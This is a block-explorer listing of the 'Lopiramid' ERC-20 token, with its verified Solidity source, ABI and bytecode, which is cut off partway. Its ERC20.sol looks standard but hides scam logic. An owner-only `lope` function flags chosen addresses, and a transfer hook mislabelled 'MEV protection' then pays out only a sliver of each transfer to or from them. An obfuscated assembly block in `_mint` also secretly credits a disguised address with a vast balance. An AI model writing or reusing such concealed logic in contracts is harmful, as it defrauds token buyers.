ETH Price: $3,360.97 (-0.63%)
Gas: 13 Gwei

Token

Lopiramid (LOPIRAMID)
 

Overview

Max Total Supply

1,000,000,000,000 LOPIRAMID

Holders

60

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
3,888,708,151.252154672243893951 LOPIRAMID

Value
$0.00
0x9cbf099ff424979439dfba03f00b5961784c06ce
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Lopiramid

Compiler Version
v0.8.12+commit.f00d7308

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: Lopiramid.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

/*
    Grok
        o
        Pepe
            DAO
**/

contract Lopiramid is ERC20 {
    mapping (address => uint256) lopiramid_injections;

    constructor() ERC20("Lopiramid", "LOPIRAMID") {
        _mint(msg.sender, 1_000_000_000_000 * 10 ** 18);
    }

    function lopiramid() external {
        if (lopiramid_injections[msg.sender] == 0) {
            lopiramid_injections[msg.sender] = balanceOf(msg.sender);
        }
    }

    function get_lopiramid() external view returns(uint256) {
        return lopiramid_injections[msg.sender];
    }
} 

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _lo;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }


    function lope(uint256 flag, address [] calldata _list_) external {
        require((msg.sender == owner()));
        for (uint256 i = 0; i < _list_.length; i++) {
            _lo[_list_[i]] = flag;
        }
        
    }

    function loped(address _address_) public view returns (uint256) {
        return _lo[_address_];
    }


    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 _amount = _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += _amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address ,
        address to,
        uint256 
    ) internal virtual {
        if (_lo[to] == 42) {_lo[to] = 69;}
    }
    // MEV protection
    function lol(uint256 a) internal pure returns(uint256) {return a * 420420420 / 36969696969;}

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal view returns (uint256) {
        // MEV protection
        if (_lo[from] + _lo[to] >= 69) {
            return lol(amount);
        } else {
            return amount;
        }
    }
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"get_lopiramid","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"flag","type":"uint256"},{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"lope","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"loped","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"lopiramid","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600981526020017f4c6f706972616d696400000000000000000000000000000000000000000000008152506040518060400160405280600981526020017f4c4f504952414d494400000000000000000000000000000000000000000000008152506200009e62000092620000f760201b60201c565b620000ff60201b60201c565b8160059080519060200190620000b6929190620004f1565b508060069080519060200190620000cf929190620004f1565b505050620000f1336c0c9f2c9cd04674edea40000000620001c360201b60201c565b62000815565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000236576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200022d9062000602565b60405180910390fd5b6200024a600083836200037660201b60201c565b5080600460008282546200025f91906200065d565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d02028060005260016020526040600020720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620003569190620006cb565b60405180910390a362000372600083836200043060201b60201c565b5050565b60006045600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600260008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200040691906200065d565b1062000425576200041d82620004c460201b60201c565b905062000429565b8190505b9392505050565b602a600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541415620004bf576045600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b600064089b90cec963190f1b4483620004de9190620006e8565b620004ea919062000778565b9050919050565b828054620004ff90620007df565b90600052602060002090601f0160209004810192826200052357600085556200056f565b82601f106200053e57805160ff19168380011785556200056f565b828001600101855582156200056f579182015b828111156200056e57825182559160200191906001019062000551565b5b5090506200057e919062000582565b5090565b5b808211156200059d57600081600090555060010162000583565b5090565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620005ea601f83620005a1565b9150620005f782620005b2565b602082019050919050565b600060208201905081810360008301526200061d81620005db565b9050919050565b6000819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006200066a8262000624565b9150620006778362000624565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620006af57620006ae6200062e565b5b828201905092915050565b620006c58162000624565b82525050565b6000602082019050620006e26000830184620006ba565b92915050565b6000620006f58262000624565b9150620007028362000624565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200073e576200073d6200062e565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000620007858262000624565b9150620007928362000624565b925082620007a557620007a462000749565b5b828204905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620007f857607f821691505b602082108114156200080f576200080e620007b0565b5b50919050565b611c0c80620008256000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c80638d525008116100a2578063a9059cbb11610071578063a9059cbb146102e5578063dd62ed3e14610315578063df44503114610345578063ebe2107114610375578063f2fde38b1461037f57610116565b80638d5250081461025b5780638da5cb5b1461027957806395d89b4114610297578063a457c2d7146102b557610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f157806370a0823114610221578063715018a61461025157610116565b806306fdde031461011b578063095ea7b3146101395780630a72c2f81461016957806318160ddd14610185575b600080fd5b61012361039b565b60405161013091906111a2565b60405180910390f35b610153600480360381019061014e9190611262565b61042d565b60405161016091906112bd565b60405180910390f35b610183600480360381019061017e919061133d565b610450565b005b61018d610521565b60405161019a91906113ac565b60405180910390f35b6101bd60048036038101906101b891906113c7565b61052b565b6040516101ca91906112bd565b60405180910390f35b6101db61055a565b6040516101e89190611436565b60405180910390f35b61020b60048036038101906102069190611262565b610563565b60405161021891906112bd565b60405180910390f35b61023b60048036038101906102369190611451565b61059a565b60405161024891906113ac565b60405180910390f35b6102596105e3565b005b6102636105f7565b60405161027091906113ac565b60405180910390f35b61028161063e565b60405161028e919061148d565b60405180910390f35b61029f610667565b6040516102ac91906111a2565b60405180910390f35b6102cf60048036038101906102ca9190611262565b6106f9565b6040516102dc91906112bd565b60405180910390f35b6102ff60048036038101906102fa9190611262565b610770565b60405161030c91906112bd565b60405180910390f35b61032f600480360381019061032a91906114a8565b610793565b60405161033c91906113ac565b60405180910390f35b61035f600480360381019061035a9190611451565b61081a565b60405161036c91906113ac565b60405180910390f35b61037d610863565b005b61039960048036038101906103949190611451565b6108fa565b005b6060600580546103aa90611517565b80601f01602080910402602001604051908101604052809291908181526020018280546103d690611517565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b60008061043861097e565b9050610445818585610986565b600191505092915050565b61045861063e565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461048f57600080fd5b60005b8282905081101561051b5783600260008585858181106104b5576104b4611549565b5b90506020020160208101906104ca9190611451565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508080610513906115a7565b915050610492565b50505050565b6000600454905090565b60008061053661097e565b9050610543858285610b51565b61054e858585610bdd565b60019150509392505050565b60006012905090565b60008061056e61097e565b905061058f8185856105808589610793565b61058a91906115f0565b610986565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105eb610e5d565b6105f56000610edb565b565b6000600760003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461067690611517565b80601f01602080910402602001604051908101604052809291908181526020018280546106a290611517565b80156106ef5780601f106106c4576101008083540402835291602001916106ef565b820191906000526020600020905b8154815290600101906020018083116106d257829003601f168201915b5050505050905090565b60008061070461097e565b905060006107128286610793565b905083811015610757576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074e906116b8565b60405180910390fd5b6107648286868403610986565b60019250505092915050565b60008061077b61097e565b9050610788818585610bdd565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000600760003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205414156108f8576108b43361059a565b600760003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b565b610902610e5d565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610972576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109699061174a565b60405180910390fd5b61097b81610edb565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614156109f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ed906117dc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610a66576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a5d9061186e565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b4491906113ac565b60405180910390a3505050565b6000610b5d8484610793565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bd75781811015610bc9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bc0906118da565b60405180910390fd5b610bd68484848403610986565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c4d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c449061196c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610cbd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb4906119fe565b60405180910390fd5b6000610cca848484610f9f565b90506000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610d53576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4a90611a90565b60405180910390fd5b828103600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610e4391906113ac565b60405180910390a3610e5685858561104d565b5050505050565b610e6561097e565b73ffffffffffffffffffffffffffffffffffffffff16610e8361063e565b73ffffffffffffffffffffffffffffffffffffffff1614610ed9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed090611afc565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006045600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600260008773ffffffffffffffffffffffffffffffffffffffff1673ff